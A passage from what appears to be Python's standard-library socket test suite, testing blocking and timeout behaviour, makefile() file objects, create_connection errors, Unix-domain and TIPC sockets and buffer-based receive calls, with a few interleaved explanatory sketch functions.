pass
def testInheritFlagsBlocking(self):
# bpo-7995: when accept() is called on a listening socket that has a
# timeout while the default timeout is None, the resulting socket
# must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: when accept() is called on a listening socket that has a
# timeout while a default timeout is set, the resulting socket must
# inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the client didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the client has now sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
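# Illustrative sketch (ours, not part of the test suite): the
# setblocking()/settimeout() equivalences that NonBlockingTCPTests checks
# above.  A positive timeout leaves getblocking() True even though the file
# descriptor is switched to non-blocking mode internally.
def _sketch_blocking_timeout_equivalence():
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.setblocking(False)            # same as s.settimeout(0.0)
        assert s.gettimeout() == 0.0 and not s.getblocking()
        s.settimeout(5.0)               # timed mode: still "blocking" for the
        assert s.getblocking()          # Python API; select() enforces the limit
        s.setblocking(True)             # same as s.settimeout(None)
        assert s.gettimeout() is None and s.getblocking()
    finally:
        s.close()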
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data has not arrived yet (can happen under Windows); wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
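# Illustrative sketch (ours): the property described in the docstring of
# UnbufferedFileObjectClassTestCase -- with bufsize=0 a second makefile()
# object can continue exactly where the first stopped, because no bytes are
# held back in a read buffer.  http.client relies on this behaviour.
def _sketch_unbuffered_makefile_handoff():
    import socket
    a, b = socket.socketpair()
    try:
        a.sendall(b"first line\nsecond line\n")
        f1 = b.makefile('rb', 0)
        assert f1.readline() == b"first line\n"
        f1.close()                      # closing the file keeps the socket open
        f2 = b.makefile('rb', 0)
        assert f2.readline() == b"second line\n"
        f2.close()
    finally:
        a.close()
        b.close()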
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
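# Illustrative sketch (ours): the text-mode makefile() combinations that the
# three Unicode*FileObjectClassTestCase variants above parametrise.  Passing
# mode 'r'/'w' together with encoding and newline makes the connection behave
# like a text file.
def _sketch_text_mode_makefile():
    import socket
    a, b = socket.socketpair()
    try:
        writer = a.makefile('w', encoding='utf-8', newline='')
        reader = b.makefile('r', encoding='utf-8', newline='')
        writer.write('h\u00e9llo\n')    # str in, UTF-8 bytes on the wire
        writer.flush()
        assert reader.readline() == 'h\u00e9llo\n'
        writer.close()
        reader.close()
    finally:
        a.close()
        b.close()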
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
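# Illustrative sketch (ours): how callers are expected to tell apart the
# failure modes that NetworkConnectionNoServer verifies above.
# create_connection() propagates the last OSError from the addresses it
# tried (e.g. ECONNREFUSED) and re-raises timeouts as socket.timeout rather
# than folding them into a generic error.  Host and port are assumptions.
def _sketch_create_connection_errors(host='127.0.0.1', port=1):
    import socket
    try:
        with socket.create_connection((host, port), timeout=0.5) as sock:
            return sock.getpeername()
    except socket.timeout:
        return 'timed out'
    except OSError as exc:
        return 'failed with errno %s' % exc.errno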
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
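# Illustrative sketch (Linux-only, ours): an AF_UNIX name whose first byte is
# NUL lives in the abstract namespace exercised by TestLinuxAbstractNamespace,
# so no filesystem entry is created and no unlink() cleanup is needed.  The
# name used here is just an example.
def _sketch_abstract_namespace_echo():
    import socket
    server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        server.bind(b"\x00sketch-abstract-demo")    # leading NUL => abstract
        server.listen()
        client.connect(server.getsockname())
        conn, _ = server.accept()
        with conn:
            client.sendall(b"ping")
            assert conn.recv(4) == b"ping"
    finally:
        client.close()
        server.close()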
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
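# Illustrative sketch (ours): the buffer-oriented receive calls covered by
# BufferIOTest fill a caller-supplied writable buffer (bytearray, memoryview,
# array of bytes, ...) and return the number of bytes written, avoiding a new
# bytes allocation per recv().
def _sketch_recv_into_usage():
    import socket
    a, b = socket.socketpair()
    try:
        a.sendall(b"hello")
        buf = bytearray(1024)
        nbytes = b.recv_into(buf)       # data lands directly in buf
        assert buf[:nbytes] == b"hello"
    finally:
        a.close()
        b.close()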
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory, or if we
# don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
